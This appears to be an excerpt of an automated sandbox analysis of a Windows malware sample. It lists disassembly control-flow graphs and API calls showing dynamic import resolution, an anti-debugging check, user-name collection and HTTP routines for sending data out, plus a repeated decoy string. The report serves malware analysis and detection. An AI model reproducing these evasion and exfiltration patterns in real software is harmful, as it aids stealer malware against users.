                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404723
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040472E
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404739
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404744
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404754
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040475F
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040476A
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404775
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404780
                                                  • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0040479C
                                                  Strings
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045F3
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404683
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404662
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040477B
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404643
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046B7
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404617
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404638
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404770
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046C2
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040475A
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040471E
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404657
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046D8
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404678
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046AC
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045E8
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046CD
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404734
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045D2
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040473F
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040474F
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404713
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045C7
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404622
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040462D
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045DD
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404765
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404729
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040466D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                                  • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                                  • API String ID: 2127927946-2218711628
                                                  • Opcode ID: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                                  • Instruction ID: ff82eb6acc97b20701c4bcbd3dbf8f3289274c2dbbe7f73b68b52ee208cac3fc
                                                  • Opcode Fuzzy Hash: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                                  • Instruction Fuzzy Hash: 1D419979740624EBC718AFE5FC8DB987F71AB4C712BA0C062F90296190C7B9D5119B3E

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 665 419860-419874 call 419750 668 419a93-419af2 LoadLibraryA * 5 665->668 669 41987a-419a8e call 419780 GetProcAddress * 21 665->669 671 419af4-419b08 GetProcAddress 668->671 672 419b0d-419b14 668->672 669->668 671->672 674 419b46-419b4d 672->674 675 419b16-419b41 GetProcAddress * 2 672->675 676 419b68-419b6f 674->676 677 419b4f-419b63 GetProcAddress 674->677 675->674 678 419b71-419b84 GetProcAddress 676->678 679 419b89-419b90 676->679 677->676 678->679 680 419bc1-419bc2 679->680 681 419b92-419bbc GetProcAddress * 2 679->681 681->680
                                                  APIs
                                                  • GetProcAddress.KERNEL32(77190000,00839EF0), ref: 004198A1
                                                  • GetProcAddress.KERNEL32(77190000,00839F08), ref: 004198BA
                                                  • GetProcAddress.KERNEL32(77190000,00839F20), ref: 004198D2
                                                  • GetProcAddress.KERNEL32(77190000,00839F38), ref: 004198EA
                                                  • GetProcAddress.KERNEL32(77190000,00866C70), ref: 00419903
                                                  • GetProcAddress.KERNEL32(77190000,008670F0), ref: 0041991B
                                                  • GetProcAddress.KERNEL32(77190000,00838458), ref: 00419933
                                                  • GetProcAddress.KERNEL32(77190000,008386B8), ref: 0041994C
                                                  • GetProcAddress.KERNEL32(77190000,00866D60), ref: 00419964
                                                  • GetProcAddress.KERNEL32(77190000,00866CA0), ref: 0041997C
                                                  • GetProcAddress.KERNEL32(77190000,00866CD0), ref: 00419995
                                                  • GetProcAddress.KERNEL32(77190000,00866CE8), ref: 004199AD
                                                  • GetProcAddress.KERNEL32(77190000,00838438), ref: 004199C5
                                                  • GetProcAddress.KERNEL32(77190000,00866A78), ref: 004199DE
                                                  • GetProcAddress.KERNEL32(77190000,00866A90), ref: 004199F6
                                                  • GetProcAddress.KERNEL32(77190000,00838478), ref: 00419A0E
                                                  • GetProcAddress.KERNEL32(77190000,00866D18), ref: 00419A27
                                                  • GetProcAddress.KERNEL32(77190000,00866D00), ref: 00419A3F
                                                  • GetProcAddress.KERNEL32(77190000,00838418), ref: 00419A57
                                                  • GetProcAddress.KERNEL32(77190000,00866BE0), ref: 00419A70
                                                  • GetProcAddress.KERNEL32(77190000,008384B8), ref: 00419A88
                                                  • LoadLibraryA.KERNEL32(00866B38,?,00416A00), ref: 00419A9A
                                                  • LoadLibraryA.KERNEL32(00866B08,?,00416A00), ref: 00419AAB
                                                  • LoadLibraryA.KERNEL32(00866D30,?,00416A00), ref: 00419ABD
                                                  • LoadLibraryA.KERNEL32(00866B68,?,00416A00), ref: 00419ACF
                                                  • LoadLibraryA.KERNEL32(00866CB8,?,00416A00), ref: 00419AE0
                                                  • GetProcAddress.KERNEL32(76850000,00866B50), ref: 00419B02
                                                  • GetProcAddress.KERNEL32(77040000,00866AA8), ref: 00419B23
                                                  • GetProcAddress.KERNEL32(77040000,00866B80), ref: 00419B3B
                                                  • GetProcAddress.KERNEL32(75A10000,00866BB0), ref: 00419B5D
                                                  • GetProcAddress.KERNEL32(75690000,00838538), ref: 00419B7E
                                                  • GetProcAddress.KERNEL32(776F0000,00867110), ref: 00419B9F
                                                  • GetProcAddress.KERNEL32(776F0000,NtQueryInformationProcess), ref: 00419BB6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$LibraryLoad
                                                  • String ID: F(t$NtQueryInformationProcess
                                                  • API String ID: 2238633743-4113152680
                                                  • Opcode ID: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                                  • Instruction ID: 20ebc6b46c949eaa7f25e90fb8197bb2e58582eade08509f86bd82c1d7e4afd5
                                                  • Opcode Fuzzy Hash: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                                  • Instruction Fuzzy Hash: 55A14DBD5C4240BFE354EFE8ED889963BFBF74E301704661AE605C3264D639A841DB12

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 769 404880-404942 call 41a7a0 call 4047b0 call 41a740 * 5 InternetOpenA StrCmpCA 784 404944 769->784 785 40494b-40494f 769->785 784->785 786 404955-404acd call 418b60 call 41a920 call 41a8a0 call 41a800 * 2 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a920 call 41a8a0 call 41a800 * 2 InternetConnectA 785->786 787 404ecb-404ef3 InternetCloseHandle call 41aad0 call 409ac0 785->787 786->787 873 404ad3-404ad7 786->873 797 404f32-404fa2 call 418990 * 2 call 41a7a0 call 41a800 * 8 787->797 798 404ef5-404f2d call 41a820 call 41a9b0 call 41a8a0 call 41a800 787->798 798->797 874 404ae5 873->874 875 404ad9-404ae3 873->875 876 404aef-404b22 HttpOpenRequestA 874->876 875->876 877 404b28-404e28 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a740 call 41a920 * 2 call 41a8a0 call 41a800 * 2 call 41aad0 lstrlenA call 41aad0 * 2 lstrlenA call 41aad0 HttpSendRequestA 876->877 878 404ebe-404ec5 InternetCloseHandle 876->878 989 404e32-404e5c InternetReadFile 877->989 878->787 990 404e67-404eb9 InternetCloseHandle call 41a800 989->990 991 404e5e-404e65 989->991 990->878 991->990 992 404e69-404ea7 call 41a9b0 call 41a8a0 call 41a800 991->992 992->989
                                                  APIs
                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                                    • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                                    • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404915
                                                  • StrCmpCA.SHLWAPI(?,0086C060), ref: 0040493A
                                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404ABA
                                                  • lstrlenA.KERNEL32(00000000,00000000,?,?,?,?,00420DDB,00000000,?,?,00000000,?,",00000000,?,0086BF20), ref: 00404DE8
                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404E04
                                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404E18
                                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404E49
                                                  • InternetCloseHandle.WININET(00000000), ref: 00404EAD
                                                  • InternetCloseHandle.WININET(00000000), ref: 00404EC5
                                                  • HttpOpenRequestA.WININET(00000000,0086C0A0,?,0086B718,00000000,00000000,00400100,00000000), ref: 00404B15
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                  • InternetCloseHandle.WININET(00000000), ref: 00404ECF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                                  • String ID: "$"$------$------$------
                                                  • API String ID: 2402878923-2180234286
                                                  • Opcode ID: af53b45c7d1414e7dc20276c78a04a4b8699d49fd5fc4d623f408e49df179ce7
                                                  • Instruction ID: 3f466b8612cc2db17a5d9ea90efc92506b51061f54fe9a8e3d974c375c306076
                                                  • Opcode Fuzzy Hash: af53b45c7d1414e7dc20276c78a04a4b8699d49fd5fc4d623f408e49df179ce7
                                                  • Instruction Fuzzy Hash: 10124EB1911118AADB14FB91DD92FEEB339AF14314F50419EB10672091DF382F9ACF6A
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                                  • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocNameProcessUser
                                                  • String ID:
                                                  • API String ID: 1206570057-0
                                                  • Opcode ID: 98be1400a0f13b17dcfec3579e84c662f1c1c1bd9e35413721d24a5daf15813c
                                                  • Instruction ID: ff9f3fb77af2488786a742b30a7a77c7a6675fe12b7944dcc27658a291e6e945
                                                  • Opcode Fuzzy Hash: 98be1400a0f13b17dcfec3579e84c662f1c1c1bd9e35413721d24a5daf15813c
                                                  • Instruction Fuzzy Hash: 08F04FB5D44208AFC710DFD8DD49BAEBBB8EB05711F10025AFA05A2680C77815448BA2
                                                  APIs
                                                  • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416A17,00420AEF), ref: 0040116A
                                                  • ExitProcess.KERNEL32 ref: 0040117E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExitInfoProcessSystem
                                                  • String ID:
                                                  • API String ID: 752954902-0
                                                  • Opcode ID: 5e169adc815d3d5e963ffc5450d2c06f987a57c1971b55ed15331b47ed99491e
                                                  • Instruction ID: a8b5f4e8781596c88644d8aa2969b9d6e82c50da38cf1cac8898b5ca04c80d98
                                                  • Opcode Fuzzy Hash: 5e169adc815d3d5e963ffc5450d2c06f987a57c1971b55ed15331b47ed99491e
                                                  • Instruction Fuzzy Hash: F4D05E7C94030CEBCB14EFE0D9496DDBB79FB0D311F001559ED0572340EA306481CAA6

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 633 419c10-419c1a 634 419c20-41a031 GetProcAddress * 43 633->634 635 41a036-41a0ca LoadLibraryA * 8 633->635 634->635 636 41a146-41a14d 635->636 637 41a0cc-41a141 GetProcAddress * 5 635->637 638 41a153-41a211 GetProcAddress * 8 636->638 639 41a216-41a21d 636->639 637->636 638->639 640 41a298-41a29f 639->640 641 41a21f-41a293 GetProcAddress * 5 639->641 642 41a2a5-41a332 GetProcAddress * 6 640->642 643 41a337-41a33e 640->643 641->640 642->643 644 41a344-41a41a GetProcAddress * 9 643->644 645 41a41f-41a426 643->645 644->645 646 41a4a2-41a4a9 645->646 647 41a428-41a49d GetProcAddress * 5 645->647 648 41a4ab-41a4d7 GetProcAddress * 2 646->648 649 41a4dc-41a4e3 646->649 647->646 648->649 650 41a515-41a51c 649->650 651 41a4e5-41a510 GetProcAddress * 2 649->651 652 41a612-41a619 650->652 653 41a522-41a60d GetProcAddress * 10 650->653 651->650 654 41a61b-41a678 GetProcAddress * 4 652->654 655 41a67d-41a684 652->655 653->652 654->655 656 41a686-41a699 GetProcAddress 655->656 657 41a69e-41a6a5 655->657 656->657 658 41a6a7-41a703 GetProcAddress * 4 657->658 659 41a708-41a709 657->659 658->659
                                                  APIs
                                                  • GetProcAddress.KERNEL32(77190000,008386D8), ref: 00419C2D
                                                  • GetProcAddress.KERNEL32(77190000,008386F8), ref: 00419C45
                                                  • GetProcAddress.KERNEL32(77190000,00866BF8), ref: 00419C5E
                                                  • GetProcAddress.KERNEL32(77190000,00866D78), ref: 00419C76
                                                  • GetProcAddress.KERNEL32(77190000,00866D90), ref: 00419C8E
                                                  • GetProcAddress.KERNEL32(77190000,00866DA8), ref: 00419CA7
                                                  • GetProcAddress.KERNEL32(77190000,008365E8), ref: 00419CBF
                                                  • GetProcAddress.KERNEL32(77190000,00866DC0), ref: 00419CD7
                                                  • GetProcAddress.KERNEL32(77190000,00866DD8), ref: 00419CF0
                                                  • GetProcAddress.KERNEL32(77190000,00866DF0), ref: 00419D08
                                                  • GetProcAddress.KERNEL32(77190000,00866E08), ref: 00419D20
                                                  • GetProcAddress.KERNEL32(77190000,008384D8), ref: 00419D39
                                                  • GetProcAddress.KERNEL32(77190000,008385D8), ref: 00419D51
                                                  • GetProcAddress.KERNEL32(77190000,00838678), ref: 00419D69
                                                  • GetProcAddress.KERNEL32(77190000,00838518), ref: 00419D82
                                                  • GetProcAddress.KERNEL32(77190000,00866E20), ref: 00419D9A
                                                  • GetProcAddress.KERNEL32(77190000,00866E38), ref: 00419DB2
                                                  • GetProcAddress.KERNEL32(77190000,008363B8), ref: 00419DCB
                                                  • GetProcAddress.KERNEL32(77190000,00838598), ref: 00419DE3
                                                  • GetProcAddress.KERNEL32(77190000,0086A068), ref: 00419DFB
                                                  • GetProcAddress.KERNEL32(77190000,0086A110), ref: 00419E14
                                                  • GetProcAddress.KERNEL32(77190000,0086A080), ref: 00419E2C
                                                  • GetProcAddress.KERNEL32(77190000,0086A098), ref: 00419E44
                                                  • GetProcAddress.KERNEL32(77190000,00838658), ref: 00419E5D
                                                  • GetProcAddress.KERNEL32(77190000,0086A0B0), ref: 00419E75
                                                  • GetProcAddress.KERNEL32(77190000,0086A0C8), ref: 00419E8D
                                                  • GetProcAddress.KERNEL32(77190000,0086A0E0), ref: 00419EA6
                                                  • GetProcAddress.KERNEL32(77190000,0086A0F8), ref: 00419EBE
                                                  • GetProcAddress.KERNEL32(77190000,0086A128), ref: 00419ED6
                                                  • GetProcAddress.KERNEL32(77190000,00869DB0), ref: 00419EEF
                                                  • GetProcAddress.KERNEL32(77190000,00869FF0), ref: 00419F07
                                                  • GetProcAddress.KERNEL32(77190000,00869EA0), ref: 00419F1F
                                                  • GetProcAddress.KERNEL32(77190000,00869E70), ref: 00419F38
                                                  • GetProcAddress.KERNEL32(77190000,00832980), ref: 00419F50
                                                  • GetProcAddress.KERNEL32(77190000,00869EE8), ref: 00419F68
